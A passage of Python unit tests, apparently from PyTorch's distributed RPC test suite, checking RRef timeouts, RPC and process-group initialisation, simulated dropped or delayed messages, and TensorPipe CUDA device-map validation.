"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
def _trainer_func(self, rref, sparse):
m = MyEmbeddingBagModel(sparse=sparse)
loss_fn = nn.MSELoss()
for i in range(10):
outputs = m(torch.rand(10, 10).long())
loss_fn(outputs, torch.rand(10, 10)).backward()
gradient = list(m.parameters())[0].grad
fut = rref.rpc_async().average(rref, i, gradient)
gradient = fut.wait()
if gradient.is_sparse:
gradient = gradient.to_dense().double()
ps_gradient = rref.rpc_sync().get_gradient(rref)
if ps_gradient.is_sparse:
ps_gradient = ps_gradient.to_dense().double()
self.assertTrue(torch.equal(gradient, ps_gradient))
def _my_parameter_server(self, sparse):
ps_rref = RRef(MyParameterServer(self.world_size - 1))
futures = []
for index in range(1, self.world_size):
futures.append(
rpc.rpc_async(
worker_name((self.rank + index) % self.world_size),
self._trainer_func,
args=(
ps_rref,
sparse
),
)
)
torch.futures.wait_all(futures)
@dist_init
def test_my_parameter_server(self):
self._my_parameter_server(False)
@dist_init
def test_my_parameter_server_sparse(self):
self._my_parameter_server(True)
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
